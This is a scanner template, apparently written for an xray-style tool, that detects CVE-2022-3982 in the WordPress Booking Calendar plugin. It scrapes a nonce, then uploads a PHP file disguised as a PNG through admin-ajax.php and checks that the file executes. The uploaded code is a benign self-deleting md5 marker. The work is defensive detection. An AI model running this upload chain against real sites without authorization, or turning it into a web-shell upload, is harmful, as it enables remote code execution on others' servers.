id: CVE-2022-3982

info:
  name: WordPress Booking Calendar <3.2.2 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  verified: false
  description: |
    WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: Fixed in 3.2.2.
  reference:
    - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867
    - https://wordpress.org/plugins/booking-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3982
  tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated
  created: 2023/06/23

set:
    r1: randomInt(40000, 44800)
    rboundary: randomLowercase(8)
    randname: randomLowercase(8)
rules:
    r0:
        request:
            method: GET
            path: /
        expression: response.status == 200
        output:
            search: '"\"ajaxNonce\":\"(?P<token>.*?)\",".bsubmatch(response.body)'
            token: search["token"]
    r1:
        request:
            method: POST
            path: /wp-admin/admin-ajax.php?action=wpdevart_form_ajax
            headers:
                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
            body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"wpdevart_id\"\r\n\nx\r\n------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\r\n\n{{token}}\r\n------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"wpdevart-submit\"\r\n\n1\r\n------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"wpdevart_data\"\r\n\n{\"wpdevart-submit\":\"X\"}\r\n------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randname}}.php\"\r\nContent-Type: image/png\r\n\r\n<?php echo md5({{r1}});unlink(__FILE__);?>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
        expression: response.status == 200
    r2:
        request:
            method: GET
            path: /wp-content/uploads/booking_calendar/{{randname}}.php
        expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1() && r2()